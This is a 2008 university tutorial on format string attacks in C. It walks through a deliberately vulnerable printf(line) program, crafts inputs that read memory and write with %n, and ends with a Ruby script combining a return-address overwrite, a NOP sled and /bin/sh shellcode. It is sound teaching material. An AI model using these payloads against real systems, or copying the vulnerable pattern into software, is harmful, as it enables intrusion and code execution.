Format String Attacks
Introduction
There is a family of C functions that allows programmers to easily output formatted text. These functions are referred to as format string functions. When used properly, they are not vulnerable at all, but when used incorrectly they expose vulnerabilities that allow for arbitrary code execution.
Building a full scale attack
To build a successful format string attack that allows for arbitrary code execution, it is imperative to understand memory, stack structure, and how the format string functions work. Once these are understood, this tutorial will lead you through the following steps building up to arbitrary code execution:
- Reading memory
- Reading exact memory location
- Altering memory with arbitrary data
- Altering exact memory location with arbitrary data
- Altering exact memory location with intentional data
Format string usage
The following program is a simple program that uses a format string function:
int main() {
int a = 5, b = 6;
char format[] = "A is %i and is at 0x%x.\nB is %i and is at 0x%x.\n";
printf(format, a, &a, b, &b);
}
The integer a |
The integer b |
The string format |
The address of b |
The value of b |
The address of a |
The value of a |
The address of format |
When the printf
function begins execution, the stack looks like the diagram on the left. The first three rows in the diagram show the local variables in the main
function. The two integers take up 4 bytes each on the stack. The string format
takes up 52 bytes of stack space.
When the setup for printf
begins, the arguments are pushed onto the stack in reverse order. First the address of b
is pushed onto the stack. Then the value of b
. The address of a
and the value of a
are then pushed onto the stack. Last, the address of the format string is pushed onto the stack.
When the printf
function begins executing, it is unaware of what arguments have been pushed onto the stack. The only thing it requires is the first argument, the address of a string. It begins reading that string and when it accesses something like a %i
, it will pop the next item off of the stack. In the above example, the function sees the %i
and pops off the value of a
which it then prints. When it reaches the %x
it pops off the address of a
and prints it. This continues until the end of the string is reached.
So what would happen with the same format string and the function call printf(format)
? The stack would look the same, but would not have the value of a
, the address of a
, the value of b
, and the address of b
. Therefore, when the printf
function accessed the first %i
, it would retrieve the next four bytes on the stack (part of the string format
) and print those as an integer. This might be a bit difficult to grasp, but it is explained a little more in the following section.
Data access
As mentioned previously, format string functions are safe when they are used correctly. The code used previously could not be attacked because there is no way to control the string passed to the printf
funciton (the input string). Format string vulnerabilities arise when the programmer accidently allows the user to control the input string. The following short program just reads from stdin
and writes to stdout
, but uses an input string that the user has control over.
#include <stdlib.h>
#include <stdio.h>
#define BUFSIZE 512
int run(FILE *input) {
char line[BUFSIZE];
fgets(line, BUFSIZE, input);
printf(line);
}
int main(int argc, char **argv) {
if (argc != 2) {
fprintf(stderr, "program requires one argument, a filename");
exit(1);
}
FILE *fd = fopen(argv[1], "r");
if (!fd) {
fprintf(stderr, "file must exist");
exit(1);
}
run(fd);
return 0;
}
This example would be safe if the printf
line was: printf("%s", line);
Quickly compiling and running this program shows that it works as expected for harmless input values:
$ gcc -m32 -g -z execstack --no-stack-protector -o example example.c
$ echo "hello world" > input && ./example input
hello world
But what if the input is something with format string arguments?
$ echo "hello %x %i %x %i %x" > input && ./example input
hello 200 134520840 80482a9 0 f7fe09e0
$ echo -e "AAAA.%x.%x.%x.%x.%x.%x" > input && ./example input
AAAA.200.804a008.80482a9.0.f7fe09e0.41414141
The first example above prints hello
followed by some data. What is this data? It's data on the stack. The second example above sheds a little more light on what the data really is.
Recalling how the printf
function works, the output from the second command prints AAAA
followed by the 6 hexadecimal formatted integers. This means the function will read 4 bytes of data 6 times and print the result. The first 4 bytes result in 200
; the second, third, and fifth in what look like memory addresses; the fourth in 0
; and finally the sixth in 41414141
.
The interesting value in this output is 41414141
. Everything is actual data read from the stack, though. The information on the stack includes the buffer line
(taking up BUFSIZE
bytes) as well other information like the 4 byte address of the buffer line
(which was pushed onto the stack when the printf
function was called).
41414141
is actually the beginning of the string stored in line
(the string that was read from the file). The character A
translates to 0x41
in ASCII, so 4 A
's is 41414141
. Think about what the output would look like if you typed an extra A
at the beginning of the input and an extra %x
at the end of the input: echo -e "AAAAA.%x.%x.%x.%x.%x.%x.%x" > input && ./example input
If you think about what should be printed out in the above example, you might wonder why the result wasn't just AAAA.41414141.junk.junk.junk.junk.junk
. The reason is that the printf
function actually calls some internal libc functions before it begins doing any real work. This alters the stack a little bit adding additional arguments. You can imagine that the internal function call looks something like this: _printf(string, format_arg1, format_arg2, 200, addr, addr, 0, addr)
. It expects the first format argument to still be the last pushed onto the stack, though, so it prints 200
first since there were no format arguments.
Specific Data Access
Reading data off of the stack is useful, but it can only get you so far. It would be a lot more interesting to be able to read data from anywhere within the program's memory. It's actually possible and pretty easy to do. This example will walk through printing out the value of the environment variable PATH
. This isn't very sensitive information, but the method used can be used to access any memory.
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("Usage:\n%s <environment variable name>\n", argv[0]);
exit(0);
}
char *addr = getenv(argv[1]);
if(addr == NULL) { printf("The environment variable %s doesn't exist.\n", argv[1]); }
else { printf("%s is located at %p\n", argv[1], addr); }
return 0;
}
Compiling the program and running it shows the address of the PATH
environment variable.
$ gcc -m32 -g -z execstack --no-stack-protector -o getenv getenv.c
$ ./getenv PATH
PATH is located at 0xffffde51
This memory address can easily be encoded at the beginning of the input string and then used to print the value of the PATH
environment variable.
$ echo -e "\x4f\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
O???.200.804a008.80482a9.0.f7fe09e0 ... /var/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0.ffffde51
$ echo -e "\x51\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
Q???.200.804a008.80482a9.0.f7fe09e0 ... ar/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
$ echo -e "\x4f\xde\xff\xff.%x.%x.%x.%x.%x ... %s" > input && ./example input
O???.200.804a008.80482a9.0.f7fe09e0 ... /var/lib/gems/1.8/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
The buffer line |
A null value |
A null value |
Some address |
The value 200 |
The address of line |
The address is first encoded into the string in reverse byte order. When the first command is executed, you can see that the address comes out in the proper order. Once this works, it's trivial to change the last %x
to a %s
. Now rather than printing out the address of the PATH
variable it will print out the value of the string at that location. The PATH
is printed as a result, but it's slightly off. The address used needs to be two bytes lower, and it prints the entire PATH
environment variable.
The reason that the address needs to be two bytes lower is because the names of the two programs are different lengths. The program getevn
is one byte shorter than example
. A one byte difference in the command name doubles to a two byte difference in the address offset.
It's important to remember at this point what's actually going on. When entering the string, the entire string is copied onto the stack. The return address is at the beginning of the string (lowest on the stack). As the printf
function encounters the %x
values, it continues to move up the stack until it reaches the original buffer line
. The first four bytes of line are the address ffffde4f
, so it can either print that using %x
or print the string at that memory location with %s
.
Altering Memory
It seems odd that functions for printing would allow writing something in memory. It's actually fairly easy to write something to memory with a format string function. Here's an example program:
#include <stdio.h>
int main() {
int written;
printf("hello world\n%n", &written);
printf("%i bytes written\n", written);
}
The %n
in a format string is actually used to track the number of characters written so far while printing something out. This could be useful when using a format string function to print something like a decimal number and you need to know how long the output was. When attacking, it makes it possible to write to memory and change, for example, the return address of a function.
Altering Memory at an Exact Location
A good memory address to alter is the return address of the printf
function. It's possible to use gdb
to find the return address of the printf
function. It's a bit tricky, though, and you must have two shells open.
Alter example.c
to make a call to sleep(10)
just before calling run(fd)
. Recompile. Then in one shell, execute the example
program. In another shell you should attach gdb
to the already running example
program as shown below. You'll have to do this within 10 seconds or change the sleep
call to something longer to allow more time.
$ ps ax | grep example
8398 pts/1 S+ 0:00 ./example input
8400 pts/2 S+ 0:00 grep example
$ gdb -q example 8398
Attaching to program: /home/example/format/example, process 8398
Reading symbols from /lib32/libc.so.6...done.
Loaded symbols for /lib32/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
warning: Lowest section in system-supplied DSO at 0xffffe000 is .hash at ffffe0b4
0xffffe402 in __kernel_vsyscall ()
(gdb) b printf
Breakpoint 1 at 0xf7ed25e4
(gdb) c
Continuing.
Breakpoint 1, 0xf7ed25e4 in printf () from /lib32/libc.so.6
(gdb) info frame
Stack level 0, frame at 0xffffd5a0:
eip = 0xf7ed25e4 in printf; saved eip 0x80484e8
called by frame at 0xffffd7c0
Arglist at 0xffffd598, args:
Locals at 0xffffd598, Previous frame's sp is 0xffffd5a0
Saved registers:
ebx at 0xffffd594, ebp at 0xffffd598, eip at 0xffffd59c
(gdb) q
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: /home/example/format/example, process 8398
The gdb
output shows that the return address for the printf
function is at 0xffffd59c
which can now be used for altering the return address.
The way to alter the address is by using a %n
in the format string. The string is crafted in the same way as when accessing random memory. First enter the address to write data to. Then add enough %x
's that the format string function will use the address as the next argument. Instead of adding a %s
at the end, though, simply put a %n
. This will write to the address rather than reading from it.
A quick test shows that altering this address crashes the program, but altering addresses 4 bytes higher does not crash it. Writing to a specific address works.
$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%x" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.ffffd59c
$ echo -e "\x9c\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.
Segmentation fault
$ echo -e "\xa0\xd5\xff\xff.%x.%x.%x.%x.%x.%n" > input && ./example input
????.200.804a008.80482a9.0.f7fe09e0.
Writing desired values
Writing a desired value is a bit more tricky. The %n
trick still has to be used. The problem is that when %n
writes a value, it actually writes a 4 byte integer. The goal is to have the return address changed to be somewhere within the input string. That location needs to be determined first.
We will use 200 nops so that the address used doesn't have to be exact, so we'll estimate that the buffer is 100 bytes above where printf
's return address is stored on the stack. That gives and address of 0xffffd600
.
Remember, %n
writes to a memory location the number of bytes that have been created so far by the printf
function. It's possible to create a string that's 0xffffd600
bytes long and then have the %n
, but it's not really practical. Instead, it's possible to split it up and write one byte at a time, though. Writing the address 0xffffd600
can be split up into four separate operations that write one byte each.
00 | 01 | 00 | 00 | |||
---|---|---|---|---|---|---|
d6 | 01 | 00 | 00 | |||
ff | 01 | 00 | 00 | |||
ff | 02 | 00 | 00 |
Remember that each number being written is 4 bytes long and that the bytes are written in reverse order. The first byte we need to write is 0x00
. To do this, we can make the input string 256 bytes long (0x100). Then when the %n
writes its value, 00
will be written to the first byte, 01
to the second byte, 00
to the third and fourth bytes. Now we need the %n
to write to the address that's one byte higher than the last and put 0xd6
in it. The string needs to be extended to length 0x1d6. To write 0xff
the first time, the string can be extended to length 0x1ff. The second 0xff
can be written by extending the string to 0x2ff
(or by simply writing the same thing again).
The table on the left shows the writing of 4 numbers. Each number is written one byte higher than the last. The end result is that the value 0xffffd600
is written into the desired memory location. Information is also overwritten in the next 3 bytes, but when overwriting a return address, that doesn't matter.
To get this to work with a format string is actually pretty easy. The formula for what the string should contain is the following:
- The address to write in reverse hex
-
Four bytes (anything will do, we use
junk
) -
The address to write
+1
in reverse hex -
Four bytes (anything will do, we use
junk
) -
The address to write
+2
in reverse hex -
Four bytes (anything will do, we use
junk
) -
The address to write
+3
in reverse hex -
One less than the number of
%8x
's so theprintf
function is using arguments from the start of the input string -
Pairs of
%#x
,%n
's to write to the addresses
Until now when printing a number we have used %x
. What the printf
function does for %x
is print the number in hexadecimal notation. It doesn't ensure that it will be a certain length, though. You can specify that you want the the output to be at least 8 digits long by using %8x
. We can use this to our advantage to control the length of the string. Using %100x
will output 100 bytes, and the value written for the %n
is now 100 greater.
With the formula above, the small ruby script below was written to create the proper input string. The important part to notice is the addr_overwrite
variable. What the printf
function will end up doing is this the following. It will print the first address entered followed by the word junk. It will do the same for the next 3 addresses (and the next two junk entries). Then it will begin handling the %8x
's. For each of those it will print exactly 8 bytes (since 32 bit addresses in hex aren't ever longer than 8 bytes). At this point, the next argument that the printf
function will interpret is 4 bytes from the start of the input string. The printf
function now reaches the first pair of %#x
, %n
's. The %x
should have a number in it that will extend the printed string long enough to write the desired integer. The printf
function will process that %x
by printing whatever is in memory just before the input string. Now it will handle the %n
and the argument it will use is the first four bytes of the input string. That's the address that we want to write to, and now it's writing a value that we want. The next %x
again extends the string, and the printf
function will print out junk
in hexadecimal notation. Then another %n
, and the printf
function will be using the second memory address to write to.
Using ruby will make writing this output a little easier. A small test program will also make it easy to test to see if the output will work properly.
$ cat output.rb
#!/usr/bin/env ruby
shellcode = ""
shellcode += "\xeb\x1c\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43"
shellcode += "\x0c\x89\xc2\x8d\x4b\x08\xb0\x0b\xcd\x80\x31\xdb\x89"
shellcode += "\xd8\x40\xcd\x80\xe8\xdf\xff\xff\xff/bin/sh"
addr_overwrite = ""
addr_overwrite += "\x9c\xd5\xff\xffjunk"
addr_overwrite += "\x9d\xd5\xff\xffjunk"
addr_overwrite += "\x9e\xd5\xff\xffjunk"
addr_overwrite += "\x9f\xd5\xff\xff"
addr_overwrite += "%8x%8x%8x%8x"
addr_overwrite += "%196x%n"
addr_overwrite += "%214x%n"
addr_overwrite += "%41x%n"
addr_overwrite += "%256x%n"
puts addr_overwrite + "\x90" * 200 + shellcode
$ chmod +x output.rb
$ cat test.c
#include <stdio.h>
#include <stdlib.h>
#define INSIZE 512
int main(int argc, char **argv) {
char line[INSIZE];
fgets(line, INSIZE, stdin);
int a, b, c, d;
printf(line, 1, 2, 3, 4, 0, &a, 0, &b, 0, &c, 0, &d);
printf("a: 0x%x\nb: 0x%x\nc: 0x%x\nd: 0x%x\n", a, b, c, d);
return 0;
}
$ gcc -m32 -g -z execstack --no-stack-protector -o test test.c
$ ./output.rb | ./test
????junk????junk????junk???? 1 2 3 4 0 0 0 0?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
??
̀1ۉ?@̀?????/bin/sh
a: 0x100
b: 0x1d6
c: 0x1ff
d: 0x2ff
When working on this part on your own, you'll have to change the values of the last for additions to the addr_overwrite
string. When you do this and rerun the command ./output.rb | ./test
, you'll see the values for a
, b
, c
and d
change. The values here match up with the desired return address 0xffffd600
. Once the addresses are correct, it's time to get a shell.
$ ./output.rb > input
$ ./example input
????junk????junk????junk???? 200 804a008 80482a9 0 f7fe09e0 6b6e756a 6b6e756a 6b6e756a?????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????[1??C??C
??
̀1ۉ?@̀?????/bin/sh
$ ls
example getenv input output.rb.save sys.c test.c written.c
example.c getenv.c output.rb sys test written
If you have difficulty getting the shellcode to execute, you should attach gdb
to the process using the same sleep
trick described above. Break at the printf
function, then use nexti
to advance until the function is about to complete. Then use info frame
to see if the return address was changed to the right value.
Copyright 2008 the following:
Sam McIngvale sam.mcingvale@u.northwestern.edu
Jim Spadaro j-spadaro@northwestern.edu
Whitney Young wbyoung@u.northwestern.edu
All rights reserved. Permission to reproduce this document in whole or in part must be obtained from the authors.